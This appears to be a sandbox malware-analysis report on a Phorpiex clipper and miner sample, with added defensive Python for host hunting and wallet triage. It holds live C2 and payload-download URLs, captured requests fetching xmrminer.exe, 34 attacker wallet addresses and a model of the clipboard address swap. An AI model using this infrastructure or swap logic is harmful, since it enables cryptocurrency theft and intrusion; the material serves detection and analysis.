Windows Analysis Report
Id4zlrsrZ4.exe

Overview

General Information

Sample Name: Id4zlrsrZ4.exe
Analysis ID: 684211
MD5: ed2d7b25bb360cccb4f0f6a4f8732d7a
SHA1: 6ffcc083956c5ac19826bdd87e12f87817ee837c
SHA256: 22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092
Tags: exe, Phorpiex

Detection

Phorpiex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Phorpiex
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Found evasive API chain (may stop execution after checking mutex)
Found strings related to Crypto-Mining
Creates HTML files with .exe extension (expired dropper behavior)
Changes security center settings (notifications, updates, antivirus, firewall)
Machine Learning detection for sample
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Drops executables to the windows directory (C:\Windows) and starts them
Contains functionality to detect sleep reduction / modifications
Contains functionality to check if Internet connection is working
Uses 32bit PE files
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
May check if the current machine is a sandbox (GetTickCount - Sleep)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • Id4zlrsrZ4.exe (PID: 6224 cmdline: "C:\Users\user\Desktop\Id4zlrsrZ4.exe" MD5: ED2D7B25BB360CCCB4F0F6A4F8732D7A)
    • winrecsv.exe (PID: 6244 cmdline: C:\Windows\winrecsv.exe MD5: ED2D7B25BB360CCCB4F0F6A4F8732D7A)
  • winrecsv.exe (PID: 6516 cmdline: "C:\Windows\winrecsv.exe" MD5: ED2D7B25BB360CCCB4F0F6A4F8732D7A)
    • 509517324.exe (PID: 6816 cmdline: C:\Users\user~1\AppData\Local\Temp\509517324.exe MD5: A475E43527D7DC7D6F2D23BAD64FCC99)
  • cleanup
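The process tree above shows the submitted file starting a copy of itself from C:\Windows\winrecsv.exe (same MD5, ed2d7b25bb360cccb4f0f6a4f8732d7a) and that copy launching a second stage, 509517324.exe, from the user's Temp directory (MD5 a475e43527d7dc7d6f2d23bad64fcc99). The following host-side hunt is an added example written for this page, not code from Joe Sandbox or from the report: it walks a mounted image or live volume, hashes every file against the hashes listed here, and falls back to two name-based indicators (the winrecsv.exe self-copy name and the all-digit drop names 509517324.exe / 1840439288.exe in a Temp directory). Treating those names as stable across infections is an assumption the report cannot confirm, and the tree built by demo() is constructed from placeholder bytes.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Hashes listed in this report. Only the MD5 of the second stage is given on the page.
KNOWN_MD5 = {
    "ed2d7b25bb360cccb4f0f6a4f8732d7a": "Id4zlrsrZ4.exe / C:\\Windows\\winrecsv.exe",
    "a475e43527d7dc7d6f2d23bad64fcc99": "second stage 509517324.exe",
}
KNOWN_SHA256 = {
    "22f524abc98f958705febd3761bedc85ec1ae859316a653b67c0c01327533092": "Id4zlrsrZ4.exe / C:\\Windows\\winrecsv.exe",
}
SELF_COPY_NAME = "winrecsv.exe"                    # name the sample copies itself to under C:\Windows
NUMERIC_EXE = re.compile(r"^\d{6,}\.exe$", re.I)   # 509517324.exe, 1840439288.exe: all-digit drop names (assumed stable)


def hash_file(path) -> tuple:
    """(md5, sha256) of a file, streamed so large images are fine."""
    md5, sha256 = hashlib.md5(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            md5.update(chunk)
            sha256.update(chunk)
    return md5.hexdigest(), sha256.hexdigest()


def hunt(root) -> list:
    """Walk a mounted image or live volume; return (path, reason) pairs.
    Hash matches are checked first, then the name-based indicators, which also
    catch a rebuilt variant that the hashes would miss."""
    findings = []
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        md5, sha256 = hash_file(path)
        name = path.name.lower()
        in_temp = "temp" in (part.lower() for part in path.parts)
        if md5 in KNOWN_MD5:
            findings.append((str(path), "md5 match: " + KNOWN_MD5[md5]))
        elif sha256 in KNOWN_SHA256:
            findings.append((str(path), "sha256 match: " + KNOWN_SHA256[sha256]))
        elif name == SELF_COPY_NAME:
            findings.append((str(path), "self-copy name without hash match (possible variant)"))
        elif NUMERIC_EXE.match(name) and in_temp:
            findings.append((str(path), "all-digit .exe in a Temp directory"))
    return findings


def demo() -> list:
    """Constructed tree mirroring the report's paths, filled with placeholder bytes, so
    only the name-based indicators fire; on a real image the hash rules would fire too."""
    root = Path(tempfile.mkdtemp(prefix="phorpiex-hunt-"))
    for rel in ("Windows/winrecsv.exe", "Users/user/AppData/Local/Temp/509517324.exe",
                "Users/user/Desktop/notes.txt", "Windows/System32/calc.exe"):
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(b"placeholder, not the sample")
    return sorted((Path(p).relative_to(root).as_posix(), why) for p, why in hunt(root))


if __name__ == "__main__":
    for path, why in demo():
        print(f"{why:55} {path}")
```

Point hunt() at a drive root or a mounted image; on a live host the hash pass is the slow part, so narrow the root to C:\Windows and the user profiles first if triage time matters.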
Malware configuration (Phorpiex):
{
  "C2 url": "http://185.215.113.66/twizt/",
  "Wallet": [
    "12SJv5p8xUHeiKnXPCDaKCMpqvXj7TABT5BSxGt3csz9Beuc",
    "1A6utf8R2zfLL7X31T5QRHdQyAx16BjdFD",
    "3PFzu8Rw8aDNhDT6d5FMrZ3ckE4dEHzogfg",
    "3BJS4zYwrnfcJMm4xLxRcsa69ght8n6QWz",
    "lskbjrchofkmqtugfw28ot7jzv96u75xzyb5bvoop",
    "qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k",
    "XgWbWpuyPGney7hcS9vZ7eNhkj7WcvGcj8",
    "DPcSSyFAYLu4aEB4s1Yotb8ANwtx6bZEQG",
    "0xb899fC445a1b61Cdd62266795193203aa72351fE",
    "LRDpmP5wHZ82LZimzWDLHVqJPDSpkM1gZ7",
    "r1eZ7W1fmUT9tiUZwK6rr3g6RNiE4QpU1",
    "TBdEh7r35ywUD5omutc2kDTX7rXhnFkxy5",
    "t1T7mBRBgTYPEL9RPPBnAVgcftiWUPBFWyy",
    "terra1smy8jurjwm790qrt5z3qrsyrx9a3lcwehvzmw3",
    "tz1fpBZAB1jz7RsefBjT94VR3h5VzL4akg6L",
    "hxc65003fbd738014cf286edf92f9ddac689ec4de5",
    "QYHny85SWYTLcZFFNNoVovyN15eNbwZdW6",
    "RRQ9QGcqnHEqJAbcEjs9X3EYsEfXrZPvEi",
    "NC7YTU5BSOVDYRUPWA3KUXP437AEZ7JNE2H3EYGI",
    "AGUqhQzF52Qwbvun5wQSrpokPtCC4b9yiX",
    "SNCjaBTsinQUDTjBvBoDLVm2AnN2qXeMCs",
    "zil14rxudm29xzmu9cyk0mcwvrlxm086evuawjy2ev",
    "s1dSgik6QuCDrRnw9yvtrLCvRLDemi2juJe",
    "bitcoincash:qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k",
    "cosmos156h8kejuwm3n7ywpwajplfzahgum8lenvkezny",
    "4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK",
    "addr1q8ujsfumgrpjvp2v6s3cfndz7yqf7cgpnjfpdlqxfphwfa0e9qneksxrycz5e4prsnx69ugqnassr8yjzm7qvjrwun6s6dfsrt",
    "aPSfmf1H5DNksgcUMV39NPJcSj832L2okm",
    "FeGdLZrnbVLsmiY9tZ4ssoRjdLDxiigQBL",
    "GCVFMTUKNLFBGHE3AHRJH4IJDRZGWOJ6JD2FQTFQAAIQR64ALD7QJHUY",
    "GSdrN7W3GsqsxqaXg4x9k5C8cf1uJeoFFg",
    "bnb1rcg9mnkzna2tw4u8ughyaj6ja8feyj87hss9ky",
    "band1f2nuxcxahrph4n4gpy4lndsp5q342fz0yjh945",
    "bc1qzs2hs5dvyx04h0erq4ea72sctcre2rcwadsq2v"
  ]
}
Yara matches: rule JoeSecurity_Phorpiex_4 (description "Yara detected Phorpiex", author Joe Security) matched the following sources:
  Sample: Id4zlrsrZ4.exe
  Dropped file: C:\Windows\winrecsv.exe
  Memory dumps:
    00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp
    00000000.00000000.339631076.0000000000410000.00000002.00000001.01000000.00000003.sdmp
    00000000.00000003.345540148.0000000000733000.00000004.00000020.00020000.00000000.sdmp
    00000005.00000000.377037453.0000000000410000.00000002.00000001.01000000.00000004.sdmp
    00000001.00000000.345529527.0000000000410000.00000002.00000001.01000000.00000004.sdmp
    (5 further entries collapsed in this export; the complete list appears in the Yara-match section below)
  Unpacked PEs:
    5.0.winrecsv.exe.400000.0.unpack
    1.0.winrecsv.exe.400000.0.unpack
    0.0.Id4zlrsrZ4.exe.400000.0.unpack
    5.2.winrecsv.exe.400000.0.unpack
    1.2.winrecsv.exe.400000.0.unpack
    (1 further entry collapsed in this export; the complete list appears in the Yara-match section below)
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: Id4zlrsrZ4.exe | Virustotal: Detection: 70%
Source: Id4zlrsrZ4.exe | ReversingLabs: Detection: 74%
Source: Id4zlrsrZ4.exe | Avira: detected
The URL entries below with trailing characters (for example /twizt/3Strong, /xmrminer.exeBLk) appear to be string fragments carved from memory; the canonical URLs, as confirmed by the captured traffic under Networking, are http://185.215.113.66/twizt/<n> and http://185.215.113.84/xmrminer.exe.
Source: http://185.215.113.66/twizt/3Strong | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/984658winrecsv.exeWindows | Avira URL Cloud: Label: malware
Source: http://185.215.113.84/xmrminer.exe | Avira URL Cloud: Label: malware
Source: http://185.215.113.84/xmrminer.exeBLk | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/1NNC: | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/3l=8 | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/4lH9 | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/6k8 | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/ | Avira URL Cloud: Label: malware
Source: http://185.215.113.84/xmrminer.exe( | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/3lZ9 | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/15C5FCA7 | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/3l | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/6lS9 | Avira URL Cloud: Label: malware
Source: http://185.215.113.84/xmrminer.exer | Avira URL Cloud: Label: malware
Source: http://185.215.113.84/xmrminer.exes | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/B1-4D5E-B0E7-362EE23EA443 | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/5#8u | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/19 | Avira URL Cloud: Label: malware
Source: http://185.215.113.84/xmrminer.exe~ | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/ | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/6 | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/5 | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/2 | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/1 | Avira URL Cloud: Label: malware
Source: http://185.215.113.84/xmrminer.exero/ | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/4 | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/3 | Avira URL Cloud: Label: malware
Source: http://185.215.113.66/twizt/3E8 | Avira URL Cloud: Label: malware
Source: http://185.215.113.84/xmrminer.exe | Virustotal: Detection: 14%
Source: C:\Windows\winrecsv.exe | Avira: detection malicious, Label: HEUR/AGEN.1237550
Source: C:\Users\user\AppData\Local\Temp\509517324.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\509517324.exe | Metadefender: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\509517324.exe | ReversingLabs: Detection: 88%
Source: C:\Windows\winrecsv.exe | ReversingLabs: Detection: 74%
Source: Id4zlrsrZ4.exe | Joe Sandbox ML: detected
Source: C:\Windows\winrecsv.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\509517324.exe | Joe Sandbox ML: detected
Source: 0.2.Id4zlrsrZ4.exe.400000.0.unpack | Malware Configuration Extractor: Phorpiex (C2 url http://185.215.113.66/twizt/ and the 34-address wallet list, reproduced in full under Overview)
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_0040AB50 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext
Source: C:\Windows\winrecsv.exe | Code function: 1_2_0040AB50 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext
Source: C:\Windows\winrecsv.exe | Code function: 5_2_0040AB50 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext
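The extracted configuration pairs one C2 URL with 34 wallet addresses spanning many currencies, and the signature list records clipboard-reading functionality; together these are the shape of a clipboard hijacker (clipper), which watches the clipboard for a wallet address and replaces it with the attacker's address of the same currency. The Python below is an added example for this page, not code from the report or from the malware: it classifies each extracted address by its public format to show which currencies this build can swap, searches free text (a clipboard dump, a transaction export, a proxy log) for the attacker's addresses, and models the swap decision. The format table is an assumption built from public prefix-and-length patterns with no checksum validation, six of the 34 addresses fall through as "unknown", and the victim address used in the usage check is constructed and is not a real wallet.

```python
import re

# Wallet list exactly as extracted by the Malware Configuration Extractor (see Overview).
PHORPIEX_WALLETS = [
    "12SJv5p8xUHeiKnXPCDaKCMpqvXj7TABT5BSxGt3csz9Beuc", "1A6utf8R2zfLL7X31T5QRHdQyAx16BjdFD",
    "3PFzu8Rw8aDNhDT6d5FMrZ3ckE4dEHzogfg", "3BJS4zYwrnfcJMm4xLxRcsa69ght8n6QWz",
    "lskbjrchofkmqtugfw28ot7jzv96u75xzyb5bvoop", "qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k",
    "XgWbWpuyPGney7hcS9vZ7eNhkj7WcvGcj8", "DPcSSyFAYLu4aEB4s1Yotb8ANwtx6bZEQG",
    "0xb899fC445a1b61Cdd62266795193203aa72351fE", "LRDpmP5wHZ82LZimzWDLHVqJPDSpkM1gZ7",
    "r1eZ7W1fmUT9tiUZwK6rr3g6RNiE4QpU1", "TBdEh7r35ywUD5omutc2kDTX7rXhnFkxy5",
    "t1T7mBRBgTYPEL9RPPBnAVgcftiWUPBFWyy", "terra1smy8jurjwm790qrt5z3qrsyrx9a3lcwehvzmw3",
    "tz1fpBZAB1jz7RsefBjT94VR3h5VzL4akg6L", "hxc65003fbd738014cf286edf92f9ddac689ec4de5",
    "QYHny85SWYTLcZFFNNoVovyN15eNbwZdW6", "RRQ9QGcqnHEqJAbcEjs9X3EYsEfXrZPvEi",
    "NC7YTU5BSOVDYRUPWA3KUXP437AEZ7JNE2H3EYGI", "AGUqhQzF52Qwbvun5wQSrpokPtCC4b9yiX",
    "SNCjaBTsinQUDTjBvBoDLVm2AnN2qXeMCs", "zil14rxudm29xzmu9cyk0mcwvrlxm086evuawjy2ev",
    "s1dSgik6QuCDrRnw9yvtrLCvRLDemi2juJe", "bitcoincash:qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k",
    "cosmos156h8kejuwm3n7ywpwajplfzahgum8lenvkezny",
    "4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK",
    "addr1q8ujsfumgrpjvp2v6s3cfndz7yqf7cgpnjfpdlqxfphwfa0e9qneksxrycz5e4prsnx69ugqnassr8yjzm7qvjrwun6s6dfsrt",
    "aPSfmf1H5DNksgcUMV39NPJcSj832L2okm", "FeGdLZrnbVLsmiY9tZ4ssoRjdLDxiigQBL",
    "GCVFMTUKNLFBGHE3AHRJH4IJDRZGWOJ6JD2FQTFQAAIQR64ALD7QJHUY", "GSdrN7W3GsqsxqaXg4x9k5C8cf1uJeoFFg",
    "bnb1rcg9mnkzna2tw4u8ughyaj6ja8feyj87hss9ky", "band1f2nuxcxahrph4n4gpy4lndsp5q342fz0yjh945",
    "bc1qzs2hs5dvyx04h0erq4ea72sctcre2rcwadsq2v",
]

B58 = "[1-9A-HJ-NP-Za-km-z]"   # Base58 alphabet (no 0, O, I, l)
# Ordered (chain, pattern) table, first match wins. Assumption: built from public address
# formats, prefix-and-length only for the single-letter Base58 families, no checksum check.
ADDRESS_FORMATS = [(name, re.compile(rx)) for name, rx in [
    ("bitcoin-bech32",    r"^bc1[a-z0-9]{39,59}$"),
    ("bitcoin-cash",      r"^(bitcoincash:)?[qp][a-z0-9]{41}$"),
    ("binance-chain",     r"^bnb1[a-z0-9]{38}$"),
    ("band",              r"^band1[a-z0-9]{38}$"),
    ("cosmos",            r"^cosmos1[a-z0-9]{38}$"),
    ("terra",             r"^terra1[a-z0-9]{38}$"),
    ("zilliqa",           r"^zil1[a-z0-9]{38}$"),
    ("cardano",           r"^addr1[a-z0-9]{50,}$"),
    ("lisk",              r"^lsk[a-z2-9]{38}$"),
    ("ethereum",          r"^0x[0-9a-fA-F]{40}$"),
    ("icon",              r"^hx[0-9a-f]{40}$"),
    ("tezos",             rf"^tz[123]{B58}{{33}}$"),
    ("zcash-transparent", rf"^t[13]{B58}{{33}}$"),
    ("monero",            rf"^4{B58}{{94}}$"),
    ("stellar",           r"^G[A-Z2-7]{55}$"),
    ("nem",               r"^N[A-Z2-7]{39}$"),
    ("polkadot",          rf"^1{B58}{{46,47}}$"),
    ("bitcoin-legacy",    rf"^[13]{B58}{{25,34}}$"),
    ("litecoin",          rf"^[LM]{B58}{{33}}$"),
    ("dogecoin",          rf"^D{B58}{{33}}$"),
    ("dash",              rf"^X{B58}{{33}}$"),
    ("tron",              rf"^T{B58}{{33}}$"),
    ("ripple",            rf"^r{B58}{{24,34}}$"),
    ("qtum",              rf"^Q{B58}{{33}}$"),
    ("neo",               rf"^A{B58}{{33}}$"),
]]
ADDRESS_TOKEN = re.compile(r"[A-Za-z0-9:]{20,120}")   # crude tokenizer for free text


def classify(address: str) -> str:
    for name, pattern in ADDRESS_FORMATS:
        if pattern.match(address):
            return name
    return "unknown"


def targeted_chains(wallets=PHORPIEX_WALLETS) -> dict:
    """chain -> attacker addresses of that chain; shows what this build is able to swap."""
    chains = {}
    for wallet in wallets:
        chains.setdefault(classify(wallet), []).append(wallet)
    return chains


def find_attacker_wallets(text: str, wallets=PHORPIEX_WALLETS) -> list:
    """Attacker addresses present in free text (clipboard dump, tx export, proxy log)."""
    wanted = set(wallets)
    return [tok for tok in ADDRESS_TOKEN.findall(text) if tok in wanted]


def clipper_would_replace(clipboard_text: str, wallets=PHORPIEX_WALLETS):
    """Model of the clipper's decision: the first address-looking token whose chain has
    an attacker wallet gets swapped for that wallet. Returns (victim, attacker) or None."""
    chains = targeted_chains(wallets)
    for tok in ADDRESS_TOKEN.findall(clipboard_text):
        chain = classify(tok)
        if chain != "unknown" and chain in chains and tok not in chains[chain]:
            return tok, chains[chain][0]
    return None


if __name__ == "__main__":
    for chain, addrs in sorted(targeted_chains().items()):
        print(f"{chain:18} {len(addrs)} address(es)")
    # constructed victim address (valid Litecoin shape, not a real wallet)
    print(clipper_would_replace("pay to La1b2c3d4e5f6g7h8j9k1m2n3p4q5r6s7t please"))
```

Run find_attacker_wallets over clipboard history, wallet-software logs and outbound proxy logs when triaging a host that ran this sample: a hit on any of the 34 addresses means a payment was already redirected, which matters more to the victim than the infection itself.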

Phishing

Source: Yara match | File source: Id4zlrsrZ4.exe, type: SAMPLE
Source: Yara match | File source: 5.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.winrecsv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Id4zlrsrZ4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.347600156.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.339631076.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.345540148.0000000000733000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.377037453.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.345529527.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.606945122.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Id4zlrsrZ4.exe PID: 6224, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: winrecsv.exe PID: 6244, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: winrecsv.exe PID: 6516, type: MEMORYSTR
Source: Yara match | File source: C:\Windows\winrecsv.exe, type: DROPPED

Bitcoin Miner

Source: 509517324.exe | String found in binary or memory: http://185.215.113.84/xmrminer.exe
Source: Id4zlrsrZ4.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Users\user\Desktop\Id4zlrsrZ4.exe | Code function: 0_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\winrecsv.exe | Code function: 1_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\winrecsv.exe | Code function: 1_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose
Source: C:\Windows\winrecsv.exe | Code function: 5_2_00404A90 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW
Source: C:\Windows\winrecsv.exe | Code function: 5_2_00404BD0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose

                          Networking

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\509517324.exeFile created: 1840439288.exe.7.dr
                          Source: C:\Users\user\Desktop\Id4zlrsrZ4.exeCode function: 0_2_00409880 htons,socket,connect,getsockname, www.update.microsoft.com0_2_00409880
                          Source: C:\Windows\winrecsv.exeCode function: 1_2_00409880 htons,socket,connect,getsockname, www.update.microsoft.com1_2_00409880
                          Source: C:\Windows\winrecsv.exeCode function: 5_2_00409880 htons,socket,connect,getsockname, www.update.microsoft.com5_2_00409880
                          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                          Source: Joe Sandbox ViewIP Address: 185.215.113.84 185.215.113.84
                          Source: global trafficHTTP traffic detected: GET /twizt/1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /xmrminer.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /xmrminer.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.84Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
